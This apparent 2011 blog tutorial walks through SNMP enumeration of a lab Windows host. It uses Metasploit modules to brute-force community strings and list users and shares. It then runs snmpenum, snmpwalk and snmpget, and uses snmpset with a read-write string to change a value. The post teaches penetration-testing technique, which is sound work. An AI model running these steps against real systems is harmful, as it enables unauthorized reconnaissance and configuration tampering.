Thursday, August 18, 2011

SNMP service enumeration

In a pentest, SNMP is very juicy service that can give deep insight into the target system & network.


Metasploit has a number of auxiliary modules to help in enumerating SNMP on target host(s).
msf > search snmp
Matching Modules
================
   Name                                               Disclosure Date  Rank    Description
   ----                                               ---------------  ----    -----------
   auxiliary/scanner/snmp/aix_version                           normal  AIX SNMP Scanner Auxiliary Module
   auxiliary/scanner/snmp/cisco_config_tftp                   normal  Cisco IOS SNMP Configuration Grabber (TFTP)
   auxiliary/scanner/snmp/cisco_upload_file                   normal  Cisco IOS SNMP File Upload (TFTP)
   auxiliary/scanner/snmp/snmp_enum                          normal  SNMP Enumeration Module
   auxiliary/scanner/snmp/snmp_enumshares                 normal  SNMP Windows SMB Share Enumeration
   auxiliary/scanner/snmp/snmp_enumusers                   normal  SNMP Windows Username Enumeration
   auxiliary/scanner/snmp/snmp_login                           normal  SNMP Community Scanner
   auxiliary/scanner/snmp/snmp_set                              normal  SNMP Set Module
...snip...
We can start with brute forcing SNMP service to identify SNMP community strings.
msf  auxiliary(snmp_enum) > use auxiliary/scanner/snmp/snmp_login
msf  auxiliary(snmp_login) > show options
Module options (auxiliary/scanner/snmp/snmp_login):
   Name              Current Setting                                                 Required  Description
   ----              ---------------                                                 --------  -----------
   BATCHSIZE         256                                                                   yes       The number of hosts to probe in each set
   BLANK_PASSWORDS   true                                                            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                yes       How fast to bruteforce, from 0 to 5
   CHOST             172.72.5.1                                                           no        The local client address
   PASSWORD                                                                                 no        The password to test
   PASS_FILE         /opt/metasploit_open/msf3/data/wordlists/snmp_default_pass.txt    no        File containing communities, one per line
   RHOSTS            172.72.5.141                                                       yes       The target address range or CIDR identifier
   RPORT             161                                                                    yes       The target port
   STOP_ON_SUCCESS   false                                                            yes       Stop guessing when a credential works for a host
   THREADS           1                                                                      yes       The number of concurrent threads
   USER_AS_PASS      true                                                                no        Try the username as the password for all users
   VERBOSE           true                                                                  yes       Whether to print output for all attempts

msf  auxiliary(snmp_login) > run
[*] 172.72.5.141:161 - SNMP - Trying public...
[+] SNMP: 172.72.5.141 community string: 'public' info: 'Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)'
[*] 172.72.5.141:161 - SNMP - Trying private...
...
[+] SNMP: 172.72.5.141 community string: 'admin' info: 'Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)'
...
snip
...
...
[*] Validating scan results from 1 hosts...
[*] Host 172.72.5.141 provides READ-WRITE access with community 'admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We found 2 community strings - 1 default public [ public ] and 1 private [ admin ]. 'public' is a read-only string while 'admin' has read-write privileges.

With this info, we can now go ahead and enumerate user accounts present on the target.

msf > info auxiliary/scanner/snmp/snmp_enumusers
       Name: SNMP Windows Username Enumeration
     Module: auxiliary/scanner/snmp/snmp_enumusers
    Version: 12107
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  tebo <tebo@attackresearch.com>
 
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  COMMUNITY  public           yes       SNMP Community String
  RETRIES    1                      yes       SNMP Retries
  RHOSTS     172.72.5.141     yes       The target address range or CIDR identifier
  RPORT      161                  yes       The target port
  THREADS    1                    yes       The number of concurrent threads
  TIMEOUT    1                    yes       SNMP Timeout
  VERSION    1                     yes       SNMP Version <1/2c>
 
Description:
  This module will use LanManager OID values to enumerate local user
  accounts on a Windows system via SNMP
msf > use auxiliary/scanner/snmp/snmp_enumusers
 
msf  auxiliary(snmp_enumusers) > run
[+] 172.72.5.141 Found Users: Administrator, Guest, HelpAssistant, IUSR_PLAYGROUND1, IWAM_PLAYGROUND1, SUPPORT_388945a0, playground 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We can also enumerate any open shares on the target using snmp_enumshares module.
msf > info auxiliary/scanner/snmp/snmp_enumshares
       Name: SNMP Windows SMB Share Enumeration
     Module: auxiliary/scanner/snmp/snmp_enumshares
    Version: 11707
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  tebo <tebo@attackresearch.com>
 
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  COMMUNITY  public           yes       SNMP Community String
  RETRIES    1                      yes       SNMP Retries
  RHOSTS     172.72.5.141     yes       The target address range or CIDR identifier
  RPORT      161                  yes       The target port
  THREADS    1                    yes       The number of concurrent threads
  TIMEOUT    1                    yes       SNMP Timeout
  VERSION    1                     yes       SNMP Version <1/2c>
 
Description:
  This module will use LanManager OID values to enumerate SMB shares
  on a Windows system via SNMP
msf > use auxiliary/scanner/snmp/snmp_enumshares
          msf  auxiliary(snmp_enumshares) > run
[+] 172.72.5.141
Python27 -  (C:\Python27)
Shared_field -  (C:\Shared_field)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

To gather more information using SNMP, we can use 'snmpenum'. This handy script uses the community strings we identified earlier to collect target system information. We need to give it the target host IP, community string, and the platform.

root@bt:/pentest/enumeration/snmpenum# ./snmpenum.pl 172.72.5.141 public windows.txt 

----------------------------------------
INSTALLED SOFTWARE
----------------------------------------
Adobe Flash Player 10 ActiveX
FileZilla Client 3.3.5.1
FileZilla Server (remove only)
0xb5546f7272656e74
WinRAR archiver
Java(TM) 6 Update 25
Python 2.7.1
Java(TM) SE Development Kit 6 Update 25
WebFldrs XP
...snip...
----------------------------------------
UPTIME
----------------------------------------
53 minutes, 33.31
----------------------------------------
HOSTNAME
----------------------------------------
PLAYGROUND1
----------------------------------------
USERS
----------------------------------------
Guest
playground
Administrator
HelpAssistant
IUSR_PLAYGROUND1
IWAM_PLAYGROUND1
SUPPORT_388945a0
----------------------------------------
DISKS
----------------------------------------
A:\
C:\ Label:  Serial Number
D:\ Label:GRTMPVOL_EN
Virtual Memory
Physical Memory
----------------------------------------
RUNNING PROCESSES
----------------------------------------
System Idle Process
System
wuauclt.exe
ctfmon.exe
...snip...
VMUpgradeHelper.exe
VMwareUser.exe
logonui.exe
snmptrap.exe
----------------------------------------
LISTENING UDP PORTS
----------------------------------------
161
162
445
500
1032
1039
1045
3456
3527
4500
----------------------------------------
SYSTEM INFO
----------------------------------------
Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)
----------------------------------------
SHARES
----------------------------------------
Python27
Shared_field
C:\Python27
C:\Shared_field
----------------------------------------
LISTENING TCP PORTS
----------------------------------------
25
80
135
443
445
1040
1042
1801
2103
2105
2107
----------------------------------------
SERVICES
----------------------------------------
Server
Themes
Event Log
IIS Admin
...snip...
Background Intelligent Transfer Service
----------------------------------------
DOMAIN
----------------------------------------
WORKGROUP
Another cool SNMP enumeration tool is 'snmpwalk'. We can use it to query the target for system information.

We need to supply the SNMP version in use, community string and the target IP. As you can see below, it gives back detailed info on OIDs and corresponding values:

snmpwalk -v 2c -c public 172.72.5.141 | more
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.311.1.1.3.1.1
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (96709) 0:16:07.09
SNMPv2-MIB::sysContact.0 = STRING: Target@playground.mil
SNMPv2-MIB::sysName.0 = STRING: PLAYGROUND1
SNMPv2-MIB::sysLocation.0 = STRING: Playground
SNMPv2-MIB::sysServices.0 = INTEGER: 76
IF-MIB::ifNumber.0 = INTEGER: 3
IF-MIB::ifIndex.1 = INTEGER: 1
IF-MIB::ifIndex.2 = INTEGER: 2
IF-MIB::ifIndex.65540 = INTEGER: 65540
IF-MIB::ifDescr.1 = STRING: MS TCP Loopback interface
IF-MIB::ifDescr.2 = STRING: AMD PCNET Family PCI Ethernet Adapter #2 - Packet Scheduler Miniport
IF-MIB::ifDescr.65540 = STRING: AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
IF-MIB::ifType.1 = INTEGER: softwareLoopback(24)
IF-MIB::ifType.2 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.65540 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifMtu.1 = INTEGER: 1520
IF-MIB::ifMtu.2 = INTEGER: 1500
IF-MIB::ifMtu.65540 = INTEGER: 1500
IF-MIB::ifSpeed.1 = Gauge32: 10000000
IF-MIB::ifSpeed.2 = Gauge32: 1000000000
...
snip
...
After this, we can use 'snmpget' to further enumerate SNMP and collect value for a specific OID.

Let's say, we want to query the value for OID 'sysLocation.0'.
snmpget -v 2c -c public 172.72.5.141 sysLocation.0
--> SNMPv2-MIB::sysLocation.0 = STRING: Playground
Cool, we see it has returned the currently configured value.

Remember, we also have a read-write privileged SNMP string - admin. Using the RW comm string, we can read and / or modify the end-target configuration easily; an attacker will use it to read / modify a router's running-config, for example.

snmpset, as the name implies, can set OID values if we have the RW snmp string.
The below command uses the RW string - admin - to change the value of OID sysLocation.0, which is a string value [ 's' option ] - Playground - to a new value NewPlayground.

snmpset -v 2c -c admin 172.72.5.141 sysLocation.0 s NewPlayground
--> SNMPv2-MIB::sysLocation.0 = STRING: NewPlayground
++++++++++

No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.